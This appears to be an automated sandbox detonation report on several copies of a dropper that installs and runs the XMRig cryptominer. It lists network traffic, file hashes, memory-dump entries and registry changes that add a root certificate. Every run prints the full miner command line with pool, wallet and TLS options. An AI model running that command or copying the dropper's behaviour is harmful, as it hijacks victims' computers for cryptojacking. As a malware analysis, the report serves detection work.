US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.113:443 www.bing.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 113.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
NL 23.62.61.113:443 www.bing.com tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 84.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2968-16-0x000001B427B10000-0x000001B427B30000-memory.dmp

memory/2968-17-0x000001B427B60000-0x000001B427B80000-memory.dmp

memory/2968-18-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-19-0x000001B427B80000-0x000001B427BA0000-memory.dmp

memory/2968-20-0x000001B427BA0000-0x000001B427BC0000-memory.dmp

memory/2968-21-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-22-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-25-0x000001B427BA0000-0x000001B427BC0000-memory.dmp

memory/2968-24-0x000001B427B80000-0x000001B427BA0000-memory.dmp

memory/2968-23-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-26-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-27-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-28-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-29-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-30-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-31-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-32-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-33-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-34-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-35-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-36-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-37-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-38-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-39-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-40-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-41-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-42-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-43-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-44-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-45-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-46-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-47-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-48-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-49-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-50-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-51-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-52-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-53-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-54-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-55-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-56-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-57-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-58-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-59-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-60-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-61-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-62-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-63-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-64-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-65-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-66-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-67-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-68-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-69-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-70-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-71-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-72-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-73-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-74-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-75-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-76-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-77-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-78-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-79-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-80-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-81-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-82-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-83-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

memory/2968-84-0x00007FF7B44A0000-0x00007FF7B4FA3000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:26

Platform

win10v2004-20240426-en

Max time kernel

1793s

Max time network

1802s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4816-14-0x00000211424A0000-0x00000211424C0000-memory.dmp

memory/4816-15-0x00000211424D0000-0x00000211424F0000-memory.dmp

memory/4816-16-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-19-0x0000021142510000-0x0000021142530000-memory.dmp

memory/4816-18-0x00000211424F0000-0x0000021142510000-memory.dmp

memory/4816-17-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-20-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-21-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-22-0x00000211424F0000-0x0000021142510000-memory.dmp

memory/4816-23-0x0000021142510000-0x0000021142530000-memory.dmp

memory/4816-24-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-25-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-26-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-27-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-28-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-29-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-30-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-31-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-32-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-33-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-34-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-35-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-36-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-37-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-38-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-39-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-40-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-41-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-42-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-43-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-44-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-45-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-46-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-47-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-48-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-49-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-50-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-51-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-52-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-53-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-54-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-55-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-56-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-57-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-58-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-59-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-60-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-61-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-62-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-63-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-64-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-65-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-66-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-67-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-68-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-69-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-70-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-71-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-72-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-73-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-74-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-75-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-76-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-77-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-78-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-79-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-80-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-81-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

memory/4816-82-0x00007FF71FA30000-0x00007FF720533000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240508-en

Max time kernel

1794s

Max time network

1796s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
NL 23.62.61.106:443 www.bing.com tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 106.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 130.109.69.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6


Analysis: behavioral6

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1790s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 19.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
NL 23.62.61.113:443 www.bing.com tcp
US 8.8.8.8:53 113.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 25.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6


Analysis: behavioral9

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240508-en

Max time kernel

1797s

Max time network

1798s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6


Analysis: behavioral10

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1796s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
